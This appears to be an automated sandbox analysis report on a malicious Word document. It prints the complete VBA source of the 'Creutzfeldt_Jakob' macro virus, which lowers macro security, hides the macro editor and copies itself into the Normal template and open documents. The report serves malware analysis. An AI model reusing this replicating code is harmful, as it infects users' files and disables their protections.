Verdict: MALICIOUS
Risk Score: 120
Malware Insights
MITRE ATT&CK
- T1566.001 Spearphishing Attachment
- T1059.005 Visual Basic
- T1547.001 Registry Run Keys / Startup Folder
The file is a malicious Word document containing VBA macros, specifically a Document_Open macro. This macro attempts to lower macro security settings and disable the macro menu item, likely to facilitate further malicious activity. The ClamAV detection as 'Win.Trojan.Psycho-3' further supports its malicious nature. The script's actions suggest an attempt to establish persistence and evade detection.
Heuristics (3)
- ClamAV: Win.Trojan.Psycho-3 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Win.Trojan.Psycho-3
- VBA macros detected (medium, 1 related finding, OLE_VBA_MACROS): Document contains VBA macro code
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3331 bytes | 1d35d991604a85b94389b505c767aa763148f510643f29f5f3f243c3840da8c3 |
Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "Creutzfeldt_Jakob"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
    On Error Resume Next
    System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
    CommandBars("Tools").Controls("Macro").Enabled = False
    Normal_PathName = NormalTemplate.FullName
    Attribs = GetAttr(Normal_PathName) And vbReadOnly
    If Attribs = 1 Then
        SetAttr Normal_PathName, vbArchive Or vbNormal
    Else
        CustomizationContext = NormalTemplate
        FindKey(BuildKeyCode(wdKeyAlt, wdKeyF11)).Clear
        FindKey(BuildKeyCode(wdKeyAlt, wdKeyF11)).Disable
    End If
    Set xActual = ActiveDocument.VBProject.VBComponents.Item(1)
    Set xNormal = NormalTemplate.VBProject.VBComponents.Item(1)
    Code_Normal = xNormal.CodeModule.CountOfLines
    Code_Actual = xActual.CodeModule.CountOfLines
    If xNormal.Name <> "Creutzfeldt_Jakob" And Attribs <> 1 Then
        xNormal.Name = "Creutzfeldt_Jakob"
        Do While Code_Normal > 0
            xNormal.CodeModule.DeleteLines 1
            Code_Normal = Code_Normal - 1
        Loop
        Counter = 1
        Do While xActual.CodeModule.Lines(Counter, 1) <> ""
            xNormal.CodeModule.InsertLines Counter, xActual.CodeModule.Lines(Counter, 1)
            Counter = Counter + 1
        Loop
    ElseIf xActual.Name <> "Creutzfeldt_Jakob" Then
        xActual.Name = "Creutzfeldt_Jakob"
        Do While Code_Actual > 0
            xActual.CodeModule.DeleteLines 1
            Code_Actual = Code_Actual - 1
        Loop
        Counter = 1
        Do While xNormal.CodeModule.Lines(Counter, 1) <> ""
            xActual.CodeModule.InsertLines Counter, xNormal.CodeModule.Lines(Counter, 1)
            Counter = Counter + 1
        Loop
    End If
    Randomize
    PayDay = Int((31 - 1 + 1) * Rnd() + 1)
    If PayDay = Day(Now) And ((Minute(Now) <= 15) Or (Minute(Now) >= 30 And Minute(Now) <= 45)) Then
        Selection.Font.Name = "Courier"
        Selection.Font.Size = 10
        Selection.Font.Bold = True
        Selection.Font.Color = wdColorAutomatic
        Selection.TypeText " (__) (__) (__) (__) (__)"
        Selection.TypeParagraph
        Selection.TypeText " (@@) (@@) (@@) (@@) (@@)"
        Selection.TypeParagraph
        Selection.TypeText " /-------\/ /-------\/ /-------\/ /-------\/ /-------\/"
        Selection.TypeParagraph
        Selection.TypeText " / | || / | || / | || / | || / | ||"
        Selection.TypeParagraph
        Selection.TypeText " * ||----|| * ||----|| * ||----|| * ||----|| * ||----||"
        Selection.TypeParagraph
        Selection.TypeText " ^^ ^^ ^^ ^^ ^^ ^^ ^^ ^^ ^^ ^^"
        Selection.TypeParagraph
        Selection.Font.Color = wdColorBlue
        Selection.TypeText "W2000M/Creutzfeldt-Jakob Macro Virus"
        Selection.TypeParagraph
        Selection.TypeText "(c)2001 by Tokugawa Ieyasu"
        Selection.TypeParagraph
    End If
    If InStr(1, ActiveDocument.Name, "Document") = False Then
        ActiveDocument.SaveAs ActiveDocument.FullName
    Else
        ActiveDocument.Saved = True
    End If
End Sub
```